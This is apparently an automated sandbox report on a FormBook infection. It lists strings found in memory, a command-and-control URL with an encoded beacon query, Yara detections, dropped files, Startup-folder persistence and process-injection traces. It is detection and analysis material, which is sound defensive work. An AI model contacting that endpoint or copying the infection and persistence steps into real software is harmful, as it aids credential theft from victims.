55 4b 55 52 69 6e 2d
Source: explorer.exe, 00000006.00000000.2226075654.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2226075654.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: chkdsk.exe, 00000009.00000003.2254364673.0000000003601000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: chkdsk.exe, 00000009.00000003.2254364673.0000000003601000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2206551971.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: chkdsk.exe, 00000009.00000003.2254364673.0000000003601000.00000004.00000001.sdmp String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: chkdsk.exe, 00000009.00000003.2254364673.0000000003601000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: chkdsk.exe, 00000009.00000003.2254364673.0000000003601000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: chkdsk.exe, 00000009.00000003.2254364673.0000000003601000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: chkdsk.exe, 00000009.00000003.2254364673.0000000003601000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0B
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2203741293.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.2203741293.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000006.00000000.2217628937.000000000861C000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: chkdsk.exe, 00000009.00000002.2383534485.0000000002BA9000.00000004.00000001.sdmp String found in binary or memory: http://www.realestateworld.club
Source: chkdsk.exe, 00000009.00000002.2383534485.0000000002BA9000.00000004.00000001.sdmp String found in binary or memory: http://www.realestateworld.club/zsh/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2203741293.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico
Source: chkdsk.exe, 00000009.00000002.2382290968.0000000000666000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/checksync.php&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2C
Source: chkdsk.exe, 00000009.00000002.2382290968.0000000000666000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/medianet.phpcid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: chkdsk.exe, 00000009.00000003.2255516069.0000000003C40000.00000004.00000001.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: chkdsk.exe, 00000009.00000003.2254364673.0000000003601000.00000004.00000001.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: chkdsk.exe, 00000009.00000002.2383604517.0000000002F1F000.00000004.00000001.sdmp String found in binary or memory: https://www.realestateworld.club/zsh/?bF=sOdpdc8WylSE20oUMI6XEqumhVh4hEgg3qNX/lZ/ecXaPMOIO0KiFboY7hZ

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000004.00000002.2193415399.00000000036B6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2382057635.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2237322220.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2193296020.0000000003569000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2220261432.0000000003533000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2237505269.0000000000540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2218859578.0000000003399000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2220136136.00000000034E6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2225048844.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2382110652.0000000000230000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2381962745.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2237415412.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2225094311.0000000000360000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2193435014.0000000003703000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2225125091.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2238667195.0000000000100000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2257843433.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Detected FormBook malware
Source: C:\Windows\SysWOW64\chkdsk.exe Dropped file: C:\Users\user\AppData\Roaming\98-QN40B\98-logri.ini
Source: C:\Windows\SysWOW64\chkdsk.exe Dropped file: C:\Users\user\AppData\Roaming\98-QN40B\98-logrv.ini
Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exe Dropped file: C:\Users\user\AppData\Roaming\98-QN40B\98-logrf.ini
Malicious sample detected (through community Yara rule)
Source: 00000004.00000002.2193415399.00000000036B6000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2193415399.00000000036B6000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2382057635.00000000001A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2382057635.00000000001A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2237322220.00000000001D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2237322220.00000000001D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2193296020.0000000003569000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2193296020.0000000003569000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2220261432.0000000003533000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2220261432.0000000003533000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2237505269.0000000000540000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2237505269.0000000000540000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2218859578.0000000003399000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2218859578.0000000003399000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2220136136.00000000034E6000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2220136136.00000000034E6000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2225048844.0000000000250000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2225048844.0000000000250000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2382110652.0000000000230000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2382110652.0000000000230000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2381962745.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2381962745.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2237415412.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2237415412.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2225094311.0000000000360000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2225094311.0000000000360000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2193435014.0000000003703000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2193435014.0000000003703000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2225125091.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2225125091.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.2238667195.0000000000100000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.2238667195.0000000000100000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.2257843433.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.2257843433.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: protected documents the yellow bar above 25 26 27 28 29 30 31 32 33 34 35 0 0 36 37
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\chkdsk.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\chkdsk.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\NETSTAT.EXE Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\NETSTAT.EXE Memory allocated: 76D20000 page execute and read and write
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 4_2_0019D018 NtQueryInformationProcess, 4_2_0019D018
Source: C:\Users\Public\vbc.exe Code function: 4_2_0019D0D9 NtQueryInformationProcess, 4_2_0019D0D9
Source: C:\Users\Public\vbc.exe Code function: 4_2_0019D010 NtQueryInformationProcess, 4_2_0019D010
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041A050 NtClose, 5_2_0041A050
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041A100 NtAllocateVirtualMemory, 5_2_0041A100
Source: C:\Users\Public\vbc.exe Code function: 5_2_00419F20 NtCreateFile, 5_2_00419F20
Source: C:\Users\Public\vbc.exe Code function: 5_2_00419FD0 NtReadFile, 5_2_00419FD0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041A04E NtClose, 5_2_0041A04E
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041A0FA NtAllocateVirtualMemory, 5_2_0041A0FA
Source: C:\Users\Public\vbc.exe Code function: 5_2_00419F72 NtCreateFile, 5_2_00419F72
Source: C:\Users\Public\vbc.exe Code function: 5_2_00419FCB NtReadFile, 5_2_00419FCB
Source: C:\Users\Public\vbc.exe Code function: 5_2_008400C4 NtCreateFile,LdrInitializeThunk, 5_2_008400C4
Source: C:\Users\Public\vbc.exe Code function: 5_2_00840048 NtProtectVirtualMemory,LdrInitializeThunk, 5_2_00840048
